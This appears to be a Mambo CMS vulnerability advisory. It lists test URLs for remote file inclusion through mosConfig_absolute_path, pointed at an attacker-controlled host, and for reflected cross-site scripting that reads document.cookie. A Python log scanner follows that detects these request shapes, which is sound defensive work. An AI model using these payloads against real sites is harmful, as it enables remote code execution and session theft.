No description provided by source.
Joxean Koret ([email protected]) provided the following test methods:
Command execution:
http://[target]/includes/Cache/Lite/Function.php?mosConfig_absolute_path=http://[attacker]/
Cross-site scripting:
http://[target]/index.php?option=com_content&task=view&id=18&Itemid=39"><script>alert(document.cookie)&a&
%20I%20am%20an%20XSS%20Problem</h1><br><br><br><br><br><br><br><br><br><br><br><br><br><&
http://<site-with-mambo>/index.php?option=com_content&task=view&id=15&Itemid=2&limit=1">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&limitstart=1
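
For defenders, the request shapes listed above can be found in web server access logs. The following is an added example, not code from the original advisory or from Mambo. It assumes combined-format log lines, that `id`, `Itemid`, `limit` and `limitstart` are meant to be plain integers, and that `mosConfig_absolute_path` is never legitimately supplied in a request. The log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: these parameters carry plain integers in legitimate requests.
NUMERIC_PARAMS = {"id", "Itemid", "limit", "limitstart"}
# A scheme prefix (http://, ftp://, ...) in the path variable means remote inclusion.
REMOTE_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)
# Request field of a combined-format log line: "METHOD target PROTOCOL".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return findings for one request target (path plus query string)."""
    findings = []
    # parse_qsl percent-decodes names and values, so encoded payloads are seen.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name == "mosConfig_absolute_path":
            # Assumption: a configuration variable has no business in a request.
            kind = "remote-include" if REMOTE_SCHEME.match(value) else "config-override"
            findings.append(kind + ":" + name)
        elif name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            findings.append("non-numeric:" + name)
    return findings

def scan(lines):
    """Return (line_number, findings) for every log line with a finding."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            found = classify(match.group(1))
            if found:
                hits.append((number, found))
    return hits

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2005:10:00:00 +0000] "GET /index.php?option=com_content'
    '&task=view&id=18&Itemid=39 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2005:10:00:05 +0000] "GET /includes/Cache/Lite/Function.php'
    '?mosConfig_absolute_path=http://example.invalid/ HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2005:10:00:09 +0000] "GET /index.php?option=com_content'
    '&task=view&id=15&Itemid=2&limit=1%22%3E%3Cscript%3E&limitstart=1 HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE):
        print(number, found)
```
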